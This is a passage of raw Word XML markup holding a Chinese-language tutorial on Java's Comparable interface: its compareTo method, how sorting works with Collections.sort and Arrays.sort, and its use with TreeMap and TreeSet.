          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparable </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是排序接口。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>若一个类实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口，就意味着</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该类支持排序</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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即然实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口的类支持排序，假设现在存在</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实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口的类的对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>列表</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或数组</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，则该</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>列表</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或数组</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可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collections.sort</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（或</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Arrays.sort</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）进行排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>此外，</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实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口的类的对象</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可以用作</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有序映射</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如</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TreeMap)”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的键或</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有序集合</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(TreeSet)”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的元素，而不需要指定比较器。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparable </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r w:rsidR="005D774E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparable </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口仅仅只包括一个函数，它的定义如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>package java.lang;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.util.*;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>public interface Comparable&lt;T&gt; {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    public int compareTo(T o);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>假设我们通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> x.compareTo(y) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来</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比较</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的大小</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。若返回</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负数</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，意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“x</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>比</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>小</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；返回</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零</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，意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“x</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等于</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>y”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；返回</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正数</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，意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“x</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>大于</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>y”</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rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparator </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是比较器接口。</w:t>
